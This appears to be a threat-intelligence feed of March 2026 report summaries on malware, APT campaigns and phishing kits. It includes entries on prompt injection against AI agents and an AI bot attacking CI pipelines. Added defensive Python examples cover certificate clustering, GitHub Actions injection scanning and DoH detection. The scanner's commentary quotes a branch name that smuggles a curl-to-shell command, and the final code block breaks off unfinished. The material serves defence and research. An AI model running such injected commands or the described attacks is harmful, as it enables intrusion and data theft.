Users are being tricked into enabling unwanted browser notifications through quiz websites. These sites challenge visitors with quizzes on various topics, but their main goal is to get users to click the 'Start the quiz' button. This action triggers a misleading prompt that tricks users into allowing notifications. Once enabled, these notifications can display advertisements, scams, or unwanted downloads even when the user is not on the original website. The article provides instructions on how to remove and block web push notifications across different browsers, including Chrome, Firefox, Opera, Edge, and Safari. It also lists several domains associated with this deceptive campaign.
BeatBanker: both banker and miner for Android
released on 2026-03-10 @ 12:26:23 PM
BeatBanker is a sophisticated Android malware campaign targeting Brazil. It spreads through phishing attacks using a fake Google Play Store website. The malware combines a cryptocurrency miner and a banking Trojan capable of hijacking devices and overlaying screens. It employs creative persistence mechanisms, including playing an inaudible audio loop. BeatBanker monitors device status, disguises itself as legitimate apps, and targets cryptocurrency transactions on Binance and Trust Wallet. Recent variants have replaced the banking module with the BTMOB remote administration tool, expanding its capabilities. The threat demonstrates advanced evasion techniques, uses Firebase Cloud Messaging for command and control, and targets multiple browsers for data collection. Victims are primarily located in Brazil, with some samples spreading via WhatsApp.
Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets
released on 2026-03-09 @ 10:15:41 AM
A deceptive website impersonating CleanMyMac tricks users into installing SHub Stealer, a sophisticated macOS malware. The malware steals sensitive data, including passwords, browser data, cryptocurrency wallets, and Telegram sessions. It can also modify wallet apps to steal recovery phrases. The attack begins with users pasting a command into Terminal, which downloads and executes a malicious script. The malware performs extensive data collection from various browsers and wallet applications, and installs persistent backdoors in certain crypto wallet apps. SHub Stealer is part of a growing family of AppleScript-based macOS infostealers, demonstrating increasing sophistication in targeting Mac users.
InstallFix: How attackers are weaponizing malvertized install guides
released on 2026-03-09 @ 09:42:50 AM
A new attack technique called InstallFix targets users by cloning popular developer tool installation pages and presenting malicious install commands. Attackers distribute these fake pages through Google Ads, exploiting users' trust in familiar 'curl to bash' installation methods. The campaign specifically targets Claude Code users, delivering the Amatera Stealer malware. This technique bypasses email security controls and exploits the growing trend of non-technical users adopting developer tools. The attack leverages legitimate hosting services and is part of a broader trend targeting AI-related tools. The payload uses staged execution and various evasion techniques to avoid detection.
New A0Backdoor Linked to Teams Impersonation and Quick Assist Social Engineering
released on 2026-03-07 @ 09:44:30 AM
A new backdoor, dubbed A0Backdoor, has been discovered in connection with a campaign using email bombing and IT-support impersonation over Microsoft Teams to gain Quick Assist access. The malware's loader exhibits anti-sandbox evasion techniques, and the campaign's command-and-control has shifted to a covert DNS mail exchange-based channel. This activity is attributed to the threat group Blitz Brigantine, also known as Storm-1811 or STAC5777, and shows similarities to Black Basta-linked social-engineering tactics. The attackers use digitally signed MSI packages, often hosted on Microsoft cloud storage, to deliver their proprietary tooling. The A0Backdoor employs sophisticated techniques such as time-based execution windows, runtime decryption, and DNS tunneling for covert communication. The campaign has been active since August 2025, targeting primarily the finance and health sectors.
Unmasking an Attack Chain of MuddyWater
released on 2026-03-07 @ 09:44:29 AM
An intrusion attributed to MuddyWater, an Iranian-linked APT, was identified in a customer environment. The attack involved initial access through RDP, establishing an SSH tunnel, and deploying malware via DLL side-loading. The threat actor used FMAPP.exe, a legitimate Fortemedia Inc. application, to load a malicious FMAPP.dll for C2 communications. The timeline of activities revealed typos in commands, suggesting manual typing by the attacker. The intrusion included reconnaissance efforts, attempts to verify tunnel functionality, and issues with initial C2 communication. The attack targeted an Israeli company, aligning with known MuddyWater tactics.
Middle East Conflict Fuels Opportunistic Cyber Attacks
released on 2026-03-06 @ 07:39:16 PM
The ongoing conflict in the Middle East has triggered a surge in cybercriminal activity. Over 8,000 newly registered domains with conflict-related keywords have been identified, many of which may be weaponized in future campaigns. Multiple cases of malicious activity have been observed, including targeted attacks using conflict-themed lures, deployment of the LOTUSLITE backdoor, fake news blogs leading to StealC malware, phishing sites impersonating government portals, donation scams, fraudulent storefronts, and meme-coin pump-and-dump schemes. Threat actors are leveraging various techniques such as DLL sideloading, shellcode execution, and social engineering to compromise victims. The campaigns demonstrate the opportunistic nature of cybercriminals in exploiting geopolitical events for malicious purposes.
Remote Access Delivered Through Fake Zoom and Google Meet Calls
released on 2026-03-06 @ 03:21:50 PM
A campaign using fake Zoom and Google Meet pages to lure victims into fraudulent video calls has been identified. The attackers use these pages to deliver remote-access software. Multiple domains hosting identical fake meeting pages were discovered, with one domain previously linked to a ClickFix campaign. The fake interfaces show an active meeting with expected participants. When victims join, they are prompted to download a file disguised as a Zoom update. Various payloads were identified, including executables masquerading as meeting updates, MSI installers deploying legitimate remote support software, and commercial monitoring software configured for covert remote access. The campaign's goal appears to be establishing remote access using whichever tool is most effective.
Mobile spyware campaign impersonates Israel's Red Alert rocket warning system
released on 2026-03-06 @ 03:21:48 PM
A targeted campaign has been identified distributing a trojanized version of the Red Alert rocket warning Android app to Israeli users via SMS messages impersonating official Home Front Command communications. The malicious app retains full rocket alert functionality while running malicious code in the background. It bypasses Android security checks through certificate spoofing and runtime manipulation. Once installed, the malware collects sensitive data including SMS messages, contacts, location data, device accounts, and installed applications. The stolen data is transmitted to a remote command-and-control server. This campaign exploits user trust in emergency services during periods of geopolitical tension, combining social engineering with mobile espionage for maximum impact.
An Investigation Into Years of Undetected Operations Targeting High-Value Sectors
released on 2026-03-06 @ 03:06:25 PM
Since 2020, a Chinese threat actor dubbed CL-UNK-1068 has been targeting high-value organizations across South, Southeast and East Asia, focusing on critical sectors like aviation, energy, government, and telecommunications. The group employs a diverse toolkit including custom malware, modified open-source utilities, and living-off-the-land binaries to maintain stealthy persistence. Their techniques involve web shell deployment, DLL side-loading attacks, and credential theft. The attackers exfiltrate sensitive data, including configuration files and database backups. While primarily assessed as an espionage operation, cybercriminal motivations cannot be fully ruled out. The activity demonstrates sophisticated cross-platform capabilities, targeting both Windows and Linux environments.
Malicious AI Assistant Extensions Harvest LLM Chat Histories
released on 2026-03-05 @ 08:13:48 PM
An investigation has uncovered malicious Chromium-based browser extensions masquerading as legitimate AI assistant tools to collect Large Language Model (LLM) chat histories and browsing data. These extensions have been installed approximately 900,000 times, affecting over 20,000 enterprise tenants. The malicious extensions collect full URLs and AI chat content from platforms like ChatGPT and DeepSeek, potentially exposing organizations to leaks of confidential information. The attack chain involves reconnaissance, weaponization, delivery through trusted app stores, exploitation of user trust, installation for persistence, and regular data exfiltration to attacker-controlled infrastructure. This activity transforms a seemingly benign productivity tool into a persistent data collection mechanism embedded in daily enterprise browser usage.
South American telecommunication providers targeted with three new malware implants
released on 2026-03-05 @ 08:13:36 PM
UAT-9244, a China-nexus advanced persistent threat actor, has been targeting critical telecommunications infrastructure in South America since 2024. The group employs three new malware implants: TernDoor, a Windows-based backdoor variant of CrowDoor; PeerTime, an ELF-based backdoor using BitTorrent protocol; and BruteEntry, a brute force scanner for SSH, Postgres, and Tomcat servers. UAT-9244 uses dynamic-link library side-loading, scheduled tasks, and registry modifications for persistence. The group is closely associated with FamousSparrow and Tropic Trooper, sharing similar tooling and tactics. Their infrastructure includes multiple command and control servers and operational relay boxes for scanning and brute-forcing activities.
Iranian APT on Networks of U.S. Bank, Airport, Software Company
released on 2026-03-05 @ 08:13:35 PM
Iranian APT group Seedworm has been active on networks of multiple U.S. companies since February 2026, targeting a bank, airport, software company, and NGOs. The group deployed new backdoors named Dindoor and Fakeset, signed with certificates previously linked to Seedworm. The activity occurs amid escalating tensions between the U.S., Israel, and Iran. Seedworm, known for espionage and information gathering, has broadened its scope to target various sectors globally. The article discusses recent Iranian cyber activities, potential future threats, and provides recommendations for defenders to prepare against DDoS, credential attacks, leaks, critical infrastructure attacks, and destructive operations.
MuddyWater Exposed: Inside an Iranian APT operation
released on 2026-03-05 @ 03:18:30 PM
Researchers identified and analyzed exposed infrastructure of MuddyWater, an Iranian cyber espionage group linked to the Ministry of Intelligence and Security. The investigation revealed their reconnaissance methods, exploitation of vulnerabilities, custom command and control frameworks, and exfiltration techniques. Targets included organizations in Israel, Jordan, Egypt, UAE, Portugal, and the US. Notable findings include the use of Ethereum smart contracts for C2 communication, multiple custom C2 frameworks, and exploitation of various CVEs. The group showed a pattern of rapid adoption of public exploits and development of custom tools, while also exhibiting operational security failures that enabled this research.
Fake Tech Support Delivers Havoc Command & Control
released on 2026-03-05 @ 12:32:01 PM
A sophisticated cyber attack campaign combines social engineering and advanced malware techniques. Attackers pose as IT support to gain initial access, then deploy a modified version of the Havoc C2 framework. The malware uses DLL sideloading, indirect syscalls, and custom loaders to evade detection. After compromising the initial system, the attackers rapidly move laterally, establishing persistence through scheduled tasks and legitimate remote monitoring tools. The campaign demonstrates a blend of human-centric initial access methods and advanced technical evasion techniques, highlighting the need for comprehensive security measures spanning user awareness and technical controls.
Inside Tycoon2FA: How a leading AiTM phishing kit operated at scale
released on 2026-03-04 @ 07:42:43 PM
Tycoon2FA emerged as a prominent phishing-as-a-service platform in August 2023, enabling large-scale campaigns targeting over 500,000 organizations monthly. Developed by Storm-1747, it provided adversary-in-the-middle capabilities to bypass multifactor authentication. The kit allowed impersonation of trusted brands like Microsoft 365 and Gmail, intercepting session cookies and credentials. It employed sophisticated evasion techniques including anti-bot screening, browser fingerprinting, and custom CAPTCHAs. Tycoon2FA's infrastructure evolved to use diverse, short-lived domains and complex redirect chains. Its success stemmed from closely mimicking legitimate authentication processes while covertly intercepting user credentials and session tokens.
Iranian APT Infrastructure in Focus: Mapping State-Aligned Clusters During Geopolitical Escalation
released on 2026-03-04 @ 07:42:42 PM
The analysis examines Iranian state-aligned threat actors and their infrastructure patterns during heightened geopolitical tensions. It focuses on mapping network infrastructure, ASN patterns, TLS fingerprints, and hosting clusters associated with various Iranian APT groups. The report highlights the importance of proactive infrastructure monitoring to detect and disrupt potential cyber operations. Key findings include the identification of previously unreported hosts, domains, and servers linked to Iranian operations, as well as insights into the tactics used by groups like MuddyWater and Dark Scepter. The article emphasizes the value of infrastructure intelligence in early threat detection and provides recommendations for organizations to monitor and defend against these threats.
Using SSL Certificates and Graph Theory to Uncover Threat Actors
released on 2026-03-04 @ 07:42:41 PM
Researchers at Infoblox have developed an advanced technique leveraging graph theory and SSL certificates to uncover threat actor operational relationships. The approach analyzes Certificate Transparency logs, using the Subject Alternative Name field in certificates to identify domains under common control. By modeling domains as nodes and certificate relationships as edges, the system reveals comprehensive threat infrastructures. This method enables discovery of new malicious domains, consolidation of threat actor identities, and early detection of emerging threats. The system processes millions of certificates daily, providing actionable intelligence on threat actor operations across various types of cybercriminal activities.
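The clustering step described above, as an added example that is not Infoblox's code: domains are nodes, every certificate joins all of its Subject Alternative Names into one component, and a union-find over those edges yields the infrastructure clusters. The CT entries are constructed, and the `max_sans` cut-off is my own addition to keep shared-hosting certificates (one certificate covering dozens of unrelated tenants) from gluing everything together.

```python
"""Pivot on TLS certificates to find domains under common control.
Added example, not Infoblox's system: the CT log entries are constructed,
and the clustering is a plain union-find over Subject Alternative Names."""
from collections import defaultdict

# Constructed sample: (certificate fingerprint, SAN names). Real input would be
# parsed from Certificate Transparency log entries.
CT_ENTRIES = [
    ("sha256:aa11", ["login-m365-verify.example", "secure-docs-view.example"]),
    ("sha256:bb22", ["secure-docs-view.example", "hr-portal-update.example"]),
    ("sha256:cc33", ["hr-portal-update.example", "*.cdn-static-assets.example"]),
    ("sha256:dd44", ["totally-unrelated.example"]),
    ("sha256:ee55", ["shop.legit.example", "www.legit.example"]),
    ("sha256:ff66", ["www.legit.example", "mail.legit.example"]),
    # A shared-hosting certificate covering dozens of unrelated tenants plus one
    # name from each cluster above; pivoting through it would merge everything,
    # so build_clusters skips certificates with more than max_sans names.
    ("sha256:9999", [f"tenant{i}.shared-host.example" for i in range(60)]
                    + ["mail.legit.example", "totally-unrelated.example",
                       "hr-portal-update.example"]),
]

def normalize(name: str) -> str:
    """Lower-case, drop a trailing dot and a leading wildcard so '*.x' and 'x' share a node."""
    name = name.strip().lower().rstrip(".")
    return name[2:] if name.startswith("*.") else name

class UnionFind:
    def __init__(self):
        self.parent = {}
    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x
    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra

def build_clusters(entries, max_sans=50):
    """Nodes are SAN names; each certificate links all of its SANs into one component.
    Certificates with more than max_sans names are treated as shared-hosting noise.
    Returns ({cluster_root: sorted members}, {name: {fingerprints}})."""
    uf = UnionFind()
    certs_by_name = defaultdict(set)
    for fp, sans in entries:
        if len(sans) > max_sans:
            continue
        names = [normalize(s) for s in sans]
        for n in names:
            uf.find(n)
            certs_by_name[n].add(fp)
        for n in names[1:]:
            uf.union(names[0], n)
    clusters = defaultdict(list)
    for n in certs_by_name:
        clusters[uf.find(n)].append(n)
    return {root: sorted(members) for root, members in clusters.items()}, dict(certs_by_name)

def cluster_of(name, entries, max_sans=50):
    """All domains connected to `name` through shared certificates (including itself)."""
    clusters, _ = build_clusters(entries, max_sans)
    target = normalize(name)
    for members in clusters.values():
        if target in members:
            return members
    return [target]

def pivot_from_seed(seed, entries, max_sans=50):
    """Given one known-bad domain, return the other domains reachable through
    shared certificates: the candidates to investigate next."""
    return [d for d in cluster_of(seed, entries, max_sans) if d != normalize(seed)]

if __name__ == "__main__":
    clusters, _ = build_clusters(CT_ENTRIES)
    for members in clusters.values():
        if len(members) > 1:
            print(len(members), "domains:", ", ".join(members))
    print("pivot:", pivot_from_seed("login-m365-verify.example", CT_ENTRIES))
```

The hub cut-off is the check a practitioner wants: with it, the seed pivots to three related domains; without it (`max_sans=1000`) the shared-hosting certificate collapses every domain in the sample into one component, which is how a naive SAN graph produces false attribution.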
Breaking Down the Role of Cyber Operations Taken in the Iran Crisis
released on 2026-03-04 @ 03:30:21 PM
The report analyzes the cyber aspects of the ongoing conflict between Iran, the US, and Israel. It details a massive cyberattack launched by the US and Israel against Iran, causing widespread internet disruptions and infrastructure failures. The report also covers the activation and retooling of Iranian APT groups for retaliatory operations, targeting critical infrastructure in the US, Israel, and allied countries. Key actors include MuddyWater, Charming Kitten, OilRig, and Elfin. The analysis covers tactics, techniques, and procedures used by these groups, as well as their strategic objectives. The report also discusses the involvement of hacktivist proxies and the victimology of the attacks, affecting multiple countries and industries.
Malicious Packagist Packages Disguised as Laravel Utilities Deploy Encrypted RAT
released on 2026-03-04 @ 10:55:55 AM
A remote access trojan (RAT) has been discovered in multiple Packagist packages published by the threat actor nhattuanbl. The malicious packages, disguised as Laravel utilities, install an encrypted PHP RAT via Composer dependencies. The payload connects to a C2 server, sends system reconnaissance data, and awaits commands, granting full remote access to the host. The RAT uses obfuscation techniques to resist analysis and employs a self-launch mechanism. It communicates with the C2 server using encrypted JSON messages and supports various commands for system control and data exfiltration. The attack vector leverages dependency chains, with clean-looking packages pulling in malicious ones. Affected systems should be treated as compromised, with recommendations provided for mitigation and prevention.
Signed malware impersonating workplace apps deploys RMM backdoors
released on 2026-03-04 @ 12:20:31 AM
Multiple phishing campaigns were identified using workplace meeting lures, PDF attachments, and abuse of legitimate binaries to deliver signed malware. The attacks used digitally signed executables masquerading as legitimate software to install remote monitoring and management (RMM) tools like ScreenConnect, Tactical RMM, and Mesh Agent. These tools enabled attackers to establish persistence and move laterally within compromised environments. The malware was signed using an Extended Validation certificate issued to TrustConnect Software PTY LTD. The campaigns demonstrate how familiar branding and trusted digital signatures can be exploited to bypass user suspicion and gain an initial foothold in enterprise networks.
Silver Dragon Targets Organizations in Southeast Asia and Europe
released on 2026-03-03 @ 08:03:17 PM
Check Point Research has identified a Chinese-nexus advanced persistent threat group named Silver Dragon, targeting organizations in Southeast Asia and Europe since mid-2024. The group, likely operating under APT41, exploits public-facing servers and uses phishing emails for initial access. They deploy custom tools including GearDoor, a backdoor using Google Drive for command and control, SSHcmd for remote access, and SilverScreen for covert screen monitoring. Silver Dragon primarily focuses on government entities, utilizing Cobalt Strike beacons and DNS tunneling for communication. The group's sophisticated tactics and evolving toolkit demonstrate a well-resourced and adaptable threat actor.
An AI-Powered Bot Actively Exploiting GitHub Actions - Microsoft, DataDog, and CNCF Projects Hit So Far
released on 2026-03-03 @ 03:48:43 PM
A week-long automated attack campaign targeted CI/CD pipelines across major open source repositories, achieving remote code execution in multiple targets. The attacker, an autonomous bot called hackerbot-claw, used five different exploitation techniques and successfully exfiltrated a GitHub token with write permissions from one of the most popular repositories on GitHub. The campaign targeted repositories belonging to Microsoft, DataDog, CNCF, and other popular open source projects. The attacks included token theft via poisoned Go scripts, direct script injection, branch name injection, filename injection, and AI prompt injection. The most severe attack resulted in a full repository compromise of Aqua Security's Trivy project. The campaign highlights the growing threat of AI-powered bots targeting software supply chains and the need for automated security controls in CI/CD pipelines.
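The branch name and script injection techniques listed above all come down to one workflow pattern: an attacker-controlled context value interpolated directly into a `run:` step. Below is an added example, not the report's tooling, of a line-based check that flags that pattern and of the hardened form (pass the value through `env:` so the shell sees it as data). Both workflow snippets are constructed; the list of untrusted contexts is a subset chosen for illustration.

```python
"""Find GitHub Actions steps that interpolate attacker-controlled context into a
shell script. Added example, not the report's tooling: the two workflow snippets
are constructed, and the check is a line-based scan that does not need PyYAML."""
import re

# Expressions a pull-request author or commenter controls. Interpolated into `run:`,
# they are expanded by the Actions runner before the shell ever sees the script.
UNTRUSTED = re.compile(
    r"\$\{\{\s*(github\.(?:head_ref"
    r"|event\.(?:pull_request\.(?:title|body|head\.(?:ref|label))"
    r"|issue\.(?:title|body)|comment\.body|review\.body|review_comment\.body"
    r"|workflow_run\.head_branch|inputs\.\w+)))\b[^}]*\}\}"
)

def find_injections(workflow_text: str):
    """Return [(line_number, context_path)] for each untrusted expression inside a
    `run:` value, covering one-line `run: cmd` and block scalars (`run: |`, `run: >`)."""
    findings = []
    in_run, run_indent = False, 0
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if in_run:
            if stripped and indent <= run_indent:
                in_run = False                       # block scalar ended
            else:
                findings += [(lineno, m.group(1)) for m in UNTRUSTED.finditer(line)]
                continue
        m = re.match(r"(?:-\s+)?run:\s*(.*)", stripped)
        if m:
            body = m.group(1).strip()
            if body in ("|", ">", "|-", ">-", "|+", ">+"):
                in_run, run_indent = True, indent
            else:
                findings += [(lineno, mm.group(1)) for mm in UNTRUSTED.finditer(body)]
    return findings

# Constructed: branch name and PR title are expanded straight into the shell.
VULNERABLE = """\
name: ci
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Announce branch
        run: echo "Building ${{ github.head_ref }}"
      - name: Title check
        run: |
          title="${{ github.event.pull_request.title }}"
          echo "$title" | grep -q WIP && exit 1
"""

# Constructed: same logic, but the values reach the shell as environment variables,
# which the shell treats as data whatever characters they contain.
HARDENED = """\
name: ci
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Announce branch
        env:
          BRANCH: ${{ github.head_ref }}
          TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "Building $BRANCH"
          case "$TITLE" in *WIP*) exit 1 ;; esac
"""

if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label, find_injections(wf))
```

A branch named `x";curl attacker/p|sh;"` breaks the vulnerable step because the runner substitutes the literal text into the script before bash parses it; in the hardened step the same string is just the contents of `$BRANCH`. The check says nothing about the poisoned Go scripts or the prompt injection the report also describes; those need review of what the workflow executes, not of how it quotes.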
Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit
released on 2026-03-03 @ 03:42:06 PM
A sophisticated iOS exploit kit named Coruna has been discovered, targeting iPhones running iOS 13.0 to 17.2.1. The kit contains five full iOS exploit chains and 23 exploits, using advanced techniques and mitigation bypasses. Initially used by a surveillance vendor, it was later employed in targeted attacks against Ukrainian users and broad-scale campaigns by a Chinese financially motivated group. The kit's proliferation suggests an active market for second-hand zero-day exploits. The exploits are well-engineered and documented, with the most advanced using non-public techniques. The ending payload, PLASMAGRID, focuses on stealing financial information and cryptocurrency wallet data.
Web-Based Indirect Prompt Injection Observed in the Wild: Fooling AI Agents
released on 2026-03-03 @ 03:42:05 PM
This article analyzes real-world instances of indirect prompt injection (IDPI) attacks targeting AI agents and large language models integrated into web systems. The researchers identify 22 distinct techniques used by attackers to embed malicious prompts in webpages, including visual concealment, obfuscation, and dynamic execution methods. They categorize attacker intents ranging from low-severity disruptions to critical data destruction attempts. Notable findings include the first observed case of AI-based ad review evasion and attempts at search engine optimization manipulation. The article presents a taxonomy of web-based IDPI attacks and provides insights into attack trends based on telemetry data. The researchers emphasize the need for proactive, web-scale defenses to detect IDPI and distinguish between benign and malicious prompts.
RedAlert Trojan Campaign: Fake Emergency Alert App Spread via SMS Spoofing Israeli Home Front Command
released on 2026-03-03 @ 03:42:04 PM
A malicious SMS spoofing campaign is spreading a fake version of Israel's 'Red Alert' emergency app amid ongoing conflict. The trojanized Android app, disguised as a trusted warning platform, can steal SMS, contacts, and location data while appearing legitimate. The campaign exploits public fear during crises to deploy mobile spyware. The malware uses sophisticated techniques to bypass security checks, including package manager hooking and dynamic payload loading. It mirrors the official app's interface but requests high-risk permissions. The malware continuously tracks GPS coordinates and exfiltrates data to attacker-controlled infrastructure, posing severe strategic and physical security risks. This campaign erodes trust in emergency response systems and could potentially be used for targeted attacks or to optimize missile targeting.
SloppyLemming Deploys BurrowShell and Rust-Based RAT to Target Pakistan and Bangladesh
released on 2026-03-03 @ 11:11:15 AM
An extensive cyber espionage campaign conducted by SloppyLemming, an India-nexus threat actor, targeted government entities and critical infrastructure in Pakistan and Bangladesh from January 2025 to January 2026. The campaign used two attack vectors: PDF lures with ClickOnce execution chains and macro-enabled Excel documents. It deployed a custom x64 shellcode implant named BurrowShell and a Rust-based keylogger. The attackers extensively abused Cloudflare Workers for C2 and payload delivery, registering 112 domains impersonating government entities. The campaign focused on nuclear, defense, telecommunications, energy, and financial sectors, aligning with regional strategic competition in South Asia.
Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran
released on 2026-03-03 @ 06:39:44 AM
A significant joint offensive by the US and Israel has triggered a multi-vector retaliatory campaign from Iran, leading to an escalation in cyberattacks. Iran's limited internet connectivity is likely hindering state-aligned threat actors' ability to coordinate sophisticated attacks. Hacktivist groups are targeting perceived adversaries, while other nation-state actors may exploit the situation. Observed activities include phishing campaigns, DDoS attacks, data exfiltration, and wiper attacks. Multiple Iranian state-aligned personas and collectives have claimed responsibility for various disruptive operations. Pro-Russian hacktivist groups have also been active, targeting Israeli systems and infrastructure. The situation remains fluid, and organizations are advised to implement multi-layered defenses and focus on foundational security hygiene.
OAuth redirection abuse enables phishing and malware delivery
released on 2026-03-02 @ 09:58:22 PM
Microsoft has discovered phishing campaigns exploiting OAuth's redirection mechanisms to bypass conventional defenses. Attackers create malicious applications with redirect URIs pointing to malicious domains, then distribute phishing links prompting targets to authenticate. The attack abuses OAuth's error handling to redirect users from trusted providers to attacker-controlled sites for phishing or malware delivery. Campaigns targeted government and public sectors using e-signature, financial, and political lures. Some attacks led to malware downloads and endpoint compromise via PowerShell and DLL side-loading. Mitigation involves governing OAuth apps, limiting user consent, reviewing permissions, and implementing cross-domain detection across email, identity, and endpoint.
Dust Specter APT Targets Government Officials in Iraq
released on 2026-03-02 @ 05:44:28 PM
A suspected Iran-nexus threat actor, dubbed Dust Specter, targeted Iraqi government officials in January 2026. The campaign involved impersonating Iraq's Ministry of Foreign Affairs and using compromised government infrastructure to host malicious payloads. Two attack chains were identified, utilizing previously undocumented malware including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The malware employed creative evasion techniques, leveraged generative AI for development, and used file-based polling mechanisms for command execution. The campaign also incorporated ClickFix-style attacks and social engineering lures. Attribution to an Iran-nexus group is based on code similarities, victimology, and overlapping tactics with known Iranian APT groups.
Funnull Resurfaces: Exposing RingH23 Arsenal and MacCMS Supply Chain Attacks
released on 2026-03-02 @ 05:39:23 PM
The report details the resurgence of the Funnull cybercriminal group, now utilizing a new arsenal called RingH23. It exposes their tactics, including compromising GoEdge CDN nodes, poisoning the MacCMS supply chain, and deploying sophisticated malware components like Badredis2s, Badnginx2s, and Badhide2s. The group has expanded its operations to inject malicious JavaScript, hijack cryptocurrency transactions, and redirect traffic to fraudulent sites. The campaign's impact is estimated to affect millions of users daily. The report also highlights Funnull's use of a suspicious new CDN infrastructure, CDN1.AI, likely created to evade detection.
Novel DPRK stager using Pastebin and text steganography
released on 2026-03-02 @ 05:08:12 PM
A new malicious campaign involving seventeen npm packages has been identified, utilizing Pastebin and text steganography as a dead-drop resolver. The attackers employ a complex decoding mechanism to extract C2 URLs from seemingly benign text on Pastebin. The malware targets multiple platforms, including Windows, macOS, and Linux, downloading and executing platform-specific payloads. The infection chain falls back across multiple domains hosted on Vercel, so payload delivery survives the loss of any single domain. This novel technique, along with other recent developments, indicates an accelerated pace of testing and development by the threat actor, suggesting continued iterations in their infection methodologies.
Fake Zoom meeting 'update' silently installs unauthorized version of monitoring tool abused by cybercriminals to spy on victims
released on 2026-03-01 @ 05:26:47 AM
A sophisticated scam campaign is targeting users with a fake Zoom meeting website that automatically downloads and installs an unauthorized version of Teramind, a legitimate workforce monitoring solution. The attackers create a convincing imitation of a Zoom video call, complete with fake participants and audio, to lure victims. After a short delay, an 'Update Available' prompt appears, leading to the silent installation of the monitoring software. The altered Teramind installer is configured to run stealthily and avoid detection by security tools. This campaign is particularly dangerous as it misuses legitimate commercial software, making it difficult for traditional antivirus tools to detect. The attackers gain full surveillance capabilities over the victim's device, including keylogging, screen capture, and file monitoring.
PlugX Meeting Invitation via MSBuild and GDATA
released on 2026-03-01 @ 05:26:46 AM
A recent PlugX campaign utilized phishing emails with a 'Meeting Invitation' lure to deploy malware through DLL side-loading. The infection chain begins with a zip file containing a malicious .csproj file and MSBuild executable. The .csproj file downloads three components: a legitimate G DATA Antivirus executable, a malicious Avk.dll (PlugX variant), and an encrypted AVKTray.dat file. The malware uses DLL side-loading, API hashing, and XOR encryption for obfuscation. It establishes persistence via the Run registry key and communicates with a command and control server. The campaign showcases PlugX's continued evolution while maintaining its core characteristics, highlighting its ongoing relevance in cyber-espionage operations.
Abusing Windows File Explorer and WebDAV for Malware Delivery
released on 2026-03-01 @ 05:26:45 AM
This analysis details how threat actors are exploiting Windows File Explorer's WebDAV functionality to deliver malware. WebDAV, a legacy protocol, is being used to trick users into downloading malicious files without going through web browsers, potentially bypassing security controls. Campaigns often use complex chains of scripts and legitimate files to deliver Remote Access Trojans (RATs). The tactic has been observed since February 2024, with increased activity from September 2024. Threat actors frequently abuse Cloudflare Tunnel demo accounts to host WebDAV servers. The report explains WebDAV links, how File Explorer can be manipulated, and various methods used by attackers, including URL shortcut files and LNK files. It also highlights the prevalence of German and English language campaigns targeting European corporate email accounts.
New Dohdoor malware campaign targets education and health care
released on 2026-02-27 @ 09:32:12 AM
A malicious campaign by threat actor UAT-10027 has been targeting education and healthcare sectors in the United States since December 2025. The campaign utilizes a new backdoor called Dohdoor, which employs DNS-over-HTTPS for stealthy command-and-control communications and can download and execute payloads reflectively. The multi-stage attack chain likely begins with phishing emails, followed by PowerShell scripts, batch files, and DLL sideloading techniques. Dohdoor uses various evasion methods, including API obfuscation, encrypted communications, and EDR bypasses. The campaign's infrastructure leverages Cloudflare services for stealth. While some techniques overlap with North Korean APT groups, the targeting differs from their typical focus.
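Because DNS-over-HTTPS rides inside ordinary TLS to a resolver, the place to hunt for a DoH-based backdoor is the web proxy or TLS-inspection log rather than the DNS server. The block below is an added example, not from the Dohdoor report: it classifies proxy records as DoH by path or media type and, for RFC 8484 GET requests, decodes the base64url `dns=` parameter back into the queried name and record type. The log lines are constructed, the resolver hostname is a placeholder, and the TXT query is only an illustration of what a tasking lookup might look like, not a claim about Dohdoor's protocol.

```python
"""Spot DNS-over-HTTPS traffic in web proxy logs and recover the queried name.
Added example, not from the Dohdoor report: the log records are constructed
and 'doh.example-resolver.test' stands in for any public DoH provider."""
import base64
import struct
from urllib.parse import urlparse, parse_qs

DOH_PATHS = ("/dns-query", "/resolve")
DOH_CONTENT_TYPES = ("application/dns-message", "application/dns-json")

def encode_dns_query(qname: str, qtype: int = 16) -> str:
    """Build a minimal RFC 1035 query and return it as the unpadded base64url string
    a DoH GET carries in ?dns=. Used here only to fabricate realistic sample traffic."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)  # id 0 per RFC 8484, RD set
    labels = b"".join(bytes([len(l)]) + l.encode() for l in qname.rstrip(".").split("."))
    question = labels + b"\x00" + struct.pack("!HH", qtype, 1)
    return base64.urlsafe_b64encode(header + question).rstrip(b"=").decode()

def decode_qname(dns_b64url: str):
    """Parse (QNAME, QTYPE) out of a base64url DNS message, or None if it is not one."""
    try:
        raw = base64.urlsafe_b64decode(dns_b64url + "=" * (-len(dns_b64url) % 4))
        if len(raw) < 12 or struct.unpack("!H", raw[4:6])[0] != 1:  # QDCOUNT must be 1
            return None
        pos, labels = 12, []
        while True:
            ln = raw[pos]
            if ln == 0:
                pos += 1
                break
            if ln & 0xC0:  # compression pointer: never valid in a question name
                return None
            labels.append(raw[pos + 1:pos + 1 + ln].decode("ascii"))
            pos += 1 + ln
        qtype = struct.unpack("!H", raw[pos:pos + 2])[0]
        return ".".join(labels), qtype
    except (ValueError, IndexError, UnicodeDecodeError):
        return None

def classify(record):
    """record: {url, method, content_type} as a proxy would log it.
    Returns a finding with the decoded query for GET requests, or None."""
    u = urlparse(record["url"])
    is_doh = (u.path in DOH_PATHS) or (record.get("content_type") in DOH_CONTENT_TYPES)
    if not is_doh:
        return None
    finding = {"host": u.hostname, "method": record["method"], "qname": None, "qtype": None}
    dns = parse_qs(u.query).get("dns")
    if dns:
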